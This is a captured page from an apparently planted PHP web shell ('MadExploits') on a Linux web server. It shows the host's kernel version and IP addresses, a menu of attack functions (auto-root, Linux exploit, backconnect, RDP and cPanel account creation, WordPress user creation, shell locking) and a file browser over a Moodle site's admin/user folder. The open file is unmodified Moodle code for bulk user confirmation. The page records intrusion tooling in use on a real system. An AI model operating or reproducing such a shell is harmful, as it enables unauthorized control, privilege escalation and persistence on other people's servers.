Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.69
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
admin /
user /
[ HOME SHELL ]
Name
Size
Permission
Action
lib.php
1.78
KB
-rw-r--r--
user_bulk.php
3.06
KB
-rw-r--r--
user_bulk_cohortadd.php
4.83
KB
-rw-r--r--
user_bulk_cohortadd_form.php
1.37
KB
-rw-r--r--
user_bulk_confirm.php
2.17
KB
-rw-r--r--
user_bulk_delete.php
2.07
KB
-rw-r--r--
user_bulk_display.php
2.48
KB
-rw-r--r--
user_bulk_download.php
3.88
KB
-rw-r--r--
user_bulk_forcepasswordchange....
2.43
KB
-rw-r--r--
user_bulk_forms.php
7.45
KB
-rw-r--r--
user_bulk_message.php
2.61
KB
-rw-r--r--
user_message_form.php
593
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user_bulk_confirm.php
<?php /** * script for bulk user delete operations */ require_once('../../config.php'); require_once($CFG->libdir.'/adminlib.php'); $confirm = optional_param('confirm', 0, PARAM_BOOL); admin_externalpage_setup('userbulk'); require_capability('moodle/user:update', context_system::instance()); $return = $CFG->wwwroot.'/'.$CFG->admin.'/user/user_bulk.php'; if (empty($SESSION->bulk_users)) { redirect($return); } echo $OUTPUT->header(); //TODO: add support for large number of users if ($confirm and confirm_sesskey()) { $notifications = ''; list($in, $params) = $DB->get_in_or_equal($SESSION->bulk_users); $rs = $DB->get_recordset_select('user', "id $in", $params, '', 'id, username, secret, confirmed, auth, firstname, lastname'); foreach ($rs as $user) { if ($user->confirmed) { continue; } $auth = get_auth_plugin($user->auth); $result = $auth->user_confirm($user->username, $user->secret); if ($result != AUTH_CONFIRM_OK && $result != AUTH_CONFIRM_ALREADY) { $notifications .= $OUTPUT->notification(get_string('usernotconfirmed', '', fullname($user, true))); } } $rs->close(); echo $OUTPUT->box_start('generalbox', 'notice'); if (!empty($notifications)) { echo $notifications; } else { echo $OUTPUT->notification(get_string('changessaved'), 'notifysuccess'); } $continue = new single_button(new moodle_url($return), get_string('continue'), 'post'); echo $OUTPUT->render($continue); echo $OUTPUT->box_end(); } else { list($in, $params) = $DB->get_in_or_equal($SESSION->bulk_users); $userlist = $DB->get_records_select_menu('user', "id $in", $params, 'fullname', 'id,'.$DB->sql_fullname().' AS fullname'); $usernames = implode(', ', $userlist); echo $OUTPUT->heading(get_string('confirmation', 'admin')); $formcontinue = new single_button(new moodle_url('user_bulk_confirm.php', array('confirm' => 1)), get_string('yes')); $formcancel = new single_button(new moodle_url('user_bulk.php'), get_string('no'), 'get'); echo $OUTPUT->confirm(get_string('confirmcheckfull', '', $usernames), $formcontinue, $formcancel); } echo $OUTPUT->footer();
Close